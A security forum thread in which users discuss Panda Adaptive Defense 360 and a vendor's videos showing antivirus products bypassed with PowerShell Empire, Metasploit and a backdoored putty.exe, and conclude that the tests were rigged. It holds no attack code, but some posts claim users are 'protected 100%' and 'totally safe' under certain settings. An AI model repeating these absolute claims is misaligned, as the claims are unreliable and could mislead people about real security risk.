Q&A Adaptive Defence 360

Discussion in 'Panda' started by owk688, Mar 2, 2017.

  1. Umbra

    Umbra From Emsisoft
    Developer

    May 16, 2011
    17,162
    29,620
    Community manager
    Vietnam & France
    Windows 10
    Emsisoft
    #141 Umbra, Apr 7, 2017
    Last edited: Apr 7, 2017
    Yes it is a home user forum, doesn't mean we can't talk about some corporate products but you will have few people interested; hence why we are on this thread.

    Do you see many threads about Sophos UTM, Symantec EP, Palo Alto, Crowdstrike, hardware Firewall, Honeypots , IDS/IPS, etc...? No, so you get the picture.
    People come here to know about Home User products , not endpoint ones, those they can buy or use for free, however some members like us work or worked as corporate admins so we are also interested by endpoints products, but 99%% of the other members here aren't.

    and honestly views means nothing, my 2016 security setup thread had 63k views lol.
     
  2. Emmanuellws

    Emmanuellws Level 3

    Mar 11, 2017
    115
    264
    Malaysia
    Windows 7
    Panda
    yes thanks for explaining that to everyone here - questions raised from your previous statement about this forum is for home products only :) 63k is a lot.Job well done. Are we gonna get anything from thousands of views...if yes...I need to do something about it...hahahah kidding man.
     
    Umbra likes this.
  3. Emmanuellws

    Emmanuellws Level 3

    Mar 11, 2017
    115
    264
    Malaysia
    Windows 7
    Panda
    Mr Umbra, Since you are one of the moderator here..probably just as a suggestion..maybe you can open a new categories for business and corporate users to post related questions..then you can actually pull in lots of business users which is good for malwaretips.com as well. Business Products and vendors can use this place as place to promote their product as well...you know like Barracuda....Sangfor.....Fortinet that stuff. Just a suggestion.
     
    Sunshine-boy likes this.
  4. Umbra

    Umbra From Emsisoft
    Developer

    May 16, 2011
    17,162
    29,620
    Community manager
    Vietnam & France
    Windows 10
    Emsisoft
    Not worth it, i can count less than 10 members who are seriously interested by corporate solutions. If people want talk about corporate solutions, just open a classic thread, but i can already guess few will comment on them.

    I am the one here that mostly open those threads lol.
     
    Emmanuellws likes this.
  5. Emmanuellws

    Emmanuellws Level 3

    Mar 11, 2017
    115
    264
    Malaysia
    Windows 7
    Panda
    #145 Emmanuellws, Apr 8, 2017
    Last edited: Apr 8, 2017
    Guys, check out Black Cipher Security channel in YouTube bypassing Antivirus and NextGen AV using penetration testing tools such as Metasploit and other malware and exploit generators..Panda Adaptive Defense 360 is in progress as requested... Black Cipher Security, contact them directly to test your favorite product security. They can do all sorts of attack including fileless or memory based attack. Stay tuned for Panda Adaptive Defense 360 video of it being bypassed.
     
    woodrowbone and Sunshine-boy like this.
  6. Amelith Nargothrond

    Mar 22, 2017
    586
    2,119
    Romania
    Windows 10
    Avira
    Wondering where did the software vendor and thread creator @owk688 disappear... This thread transformed into a Panda commercial.
     
  7. Emmanuellws

    Emmanuellws Level 3

    Mar 11, 2017
    115
    264
    Malaysia
    Windows 7
    Panda
    #147 Emmanuellws, Apr 8, 2017
    Last edited: Apr 8, 2017
    It's ok.
     
  8. Emmanuellws

    Emmanuellws Level 3

    Mar 11, 2017
    115
    264
    Malaysia
    Windows 7
    Panda

    Finally, after waiting...Black Cipher Security managed to bypass PAD360 and had to use the most sophisticated attack - Powershell through memory/RAM under hardening mode (Medium protection) although I suspect they rigged the test by allowing the uploaded backdoored application to "unblock" in the Cloud Console...still they need to use 3 tools combination namely, Powershell Empire, Metasploit and Veil-Evasion....and also they bypassed all other AV / Next GenAV from EmiSoft, Symantec, TrendMicro, F-Secure, Webroot, Avast, Sophos including its Intercept X, McAffee...upcoming..they are trying more including Cylance.....in fact, the only technology that can prevent their attack is Carbon Black with their own so called "Streaming Prevention" protection mechanism - apparently that is the product that they will introduce to corporate company or government. So all PAD360 users, please use Lock mode as Black Cipher said it blocked their backdoored application, hackers won't get far if they use this sophisticated attack. Apart from that, you are totally safe and secure under Lock mode. Oh by the way, apart from the 12 minutes bypass demo after their 6 days test and research....all other brand mentioned just now only took them between 5-7 minutes for a complete attack...and with only one tool Powershell Empire or just Metasploit. Powershell Fileless Attack is the real deal that all AV need to look out for. It won't leave any traces because it will not leave any files on the disk, it will not use any malware signature as it will uses existing Windows OS system apps like powershell and WMI to do hijacking, to steal data or to infect with ransomware through your PC RAM/memory. Stay safe everyone no matter what is your AV and ensure you have application whitelisting running with your AV so hackers cannot advanced further. Setup a log instances of powershell activity. Get notification and detect and take action. Last but not least, disable powershell if you dont use it, but still disabling won't prevent them from running their own powershell instances directly from their tool as the .NET dlls still running in your computer.
     
    Sunshine-boy likes this.
  9. Emmanuellws

    Emmanuellws Level 3

    Mar 11, 2017
    115
    264
    Malaysia
    Windows 7
    Panda
    #149 Emmanuellws, Apr 17, 2017
    Last edited: Apr 17, 2017
    and the final summary is, Panda Adaptive Defense 360 - Workstation Policy is the best security configuration. Confirmed that they used the "Server Policy" which will allow powershell to execute and Windows 7 VM running Powershell 1.0/2.0 makes it is easier (See the videos comment section). No wonder it takes them 6 days to publish a 12 minute bypass demo video since my request made - the longest among all bypassed product so far bcoz there is no way and not much for them to customize the policy on the endpoint. So PAD360 users, don't worry, you are protected 100% no matter what powershell attack on the "Advanced Protection Workstation Policy". For Policy using servers, recommended to run minimum Windows Server 2016 to reduce the attack vector. If your servers are running Windows server 2016 with PAD360 Server Policy, and your endpoints are on PAD360 Workstation Policy, you are secured. All malware attack started from endpoints and will go to servers since endpoints are the ones that download and executes email attachment. Black Cipher Security did a good job of pointing out a weakness in the Server Policy since they could not exploit the workstation policy. I as a PAD360 users, accept the weakness but it won't happen bcoz we dont use servers to donwload email and open attachment directly. all in all...PAD360 is a good choice for enterprise endpoint security. Hmm...now I am off to check on LogRhythm or CyberShark features for visibility on network attacks and integrity. Chiaooo!
     
    Sunshine-boy likes this.
  10. jamescv7

    jamescv7 Level 61
    Trusted

    Mar 15, 2011
    12,664
    17,722
    Web and FileMaker Developer
    Philippines
    Windows 10
    Microsoft
    Yes you are correct, a reason why it should integrate properly the Anti-exe concept or whitelisting technology since the purpose is to monitor the current programs which may provide different behavior so that the user can check and analyze the information.

    Fileless is already been notified by some AV however the information must be prioritized by research.
     
  11. Umbra

    Umbra From Emsisoft
    Developer

    May 16, 2011
    17,162
    29,620
    Community manager
    Vietnam & France
    Windows 10
    Emsisoft
    If a software can't protect the memory, it has no uses to me.
     
    TerrakionSmash and Emmanuellws like this.
  12. Emmanuellws

    Emmanuellws Level 3

    Mar 11, 2017
    115
    264
    Malaysia
    Windows 7
    Panda
    Well, I agree on this statement.
     
    Sunshine-boy and Umbra like this.
  13. Emmanuellws

    Emmanuellws Level 3

    Mar 11, 2017
    115
    264
    Malaysia
    Windows 7
    Panda
    Finally, BCS admitted they unblocked the backdoored putty.exe manually which allows the attack to leveraged to another level and allow full takeover. upload_2017-4-21_8-44-34.png
    My explanation to them is - Well it stopped that exe, yes because it is unknown...if the original putty.exe was untouched it would have been allowed, but since if anyone modifies the integrity of a file, it will be unknown, and sooner it will be flagged as malware after completed analysis and found out it creates an unwanted connection right after launching it. That's the feature of PAD360, it should blocked all zero day or unclassified programs, which will greatly reduce of a new attack. They said it will cause some productivity issue, I said hell no, because they easily allow unblock and allow their attack to progress further. By now, the backdoored putty.exe is already flagged as malware.

    For all other Av products that they bypassed, I believe they did some unblock too and allow their attack to run which we viewers didn't see in which they admitted in this video.
     
    TerrakionSmash likes this.
  14. Umbra

    Umbra From Emsisoft
    Developer

    May 16, 2011
    17,162
    29,620
    Community manager
    Vietnam & France
    Windows 10
    Emsisoft
    @Emmanuellws they are Cylance reseller, and Cylance used to do "arranged" videos as they did in their demonstration "tours" ; so no surprises to me...
     
    Emmanuellws likes this.
  15. Emmanuellws

    Emmanuellws Level 3

    Mar 11, 2017
    115
    264
    Malaysia
    Windows 7
    Panda
    upload_2017-4-21_13-21-35.png

    Yes, Cylance and Carbon Black Defense. Well, even if it is unfair I managed to get them to admit that they rigged the test so there is an explanation behind all other AV products that they bypassed as well. So, don't worry, love and trust your own AV or security product, master it, and check your configuration. Oh well, at least they proved that if we mis-configured or reduced the security of a product, we sure get the attack to work flawlessly.
     
  16. Umbra

    Umbra From Emsisoft
    Developer

    May 16, 2011
    17,162
    29,620
    Community manager
    Vietnam & France
    Windows 10
    Emsisoft
    i don't need rigged tests to know that :D
     
  17. Emmanuellws

    Emmanuellws Level 3

    Mar 11, 2017
    115
    264
    Malaysia
    Windows 7
    Panda
    well not everyone is as good as you...so this serve as a reminder to others including myself. hehehe
     
    Umbra and Sunshine-boy like this.
  18. Umbra

    Umbra From Emsisoft
    Developer

    May 16, 2011
    17,162
    29,620
    Community manager
    Vietnam & France
    Windows 10
    Emsisoft
    What i don't like is the way they hide the important informations during the video.
    - In Panda the unblocked a file,
    - in ERP video they do't show the vulnerable processes;
    - in Comodo , they put paranoid mode but enabled safe mode and allow trusted processes;

    and when i asked them to show all settings next time , they don't replied. that is shady...
     
    Sunshine-boy and Emmanuellws like this.
  19. Emmanuellws

    Emmanuellws Level 3

    Mar 11, 2017
    115
    264
    Malaysia
    Windows 7
    Panda
    I agree with you buddy. In the end, its all for their marketing purposes because it was not done by a real hacker or security hobbyist that do not earn profits. IF the bypassed demo videos were done fairly without tuning down the product's true capability, it would have been a different story. Let's sum up this way about their videos: They failed to show the weaknesses of those bypassed AV/Security products, instead, they showed their own weaknesses - by cheating.
     
    shmu26, Sunshine-boy and Umbra like this.
  20. Emmanuellws

    Emmanuellws Level 3

    Mar 11, 2017
    115
    264
    Malaysia
    Windows 7
    Panda
    @Umbra, Finally, Black Cipher Security plays it fair but they turned OFF some protections ->Application Control, Powershell and Active Scripts Protection.
     
    Sunshine-boy and Umbra like this.
Loading...
Similar Threads Forum Date
Android Oreo Adaptive Icons Bug Sends Thousands of Phones Into Infinite Boot Loops Security News Nov 1, 2017
Action Launcher/Adaptive Pack Icon app for iOS? Android, iOS and Windows 10 Mobile Sep 13, 2017
Adaptive Authentication on the Rise as 2FA Fervor Wanes News Archive Jan 14, 2017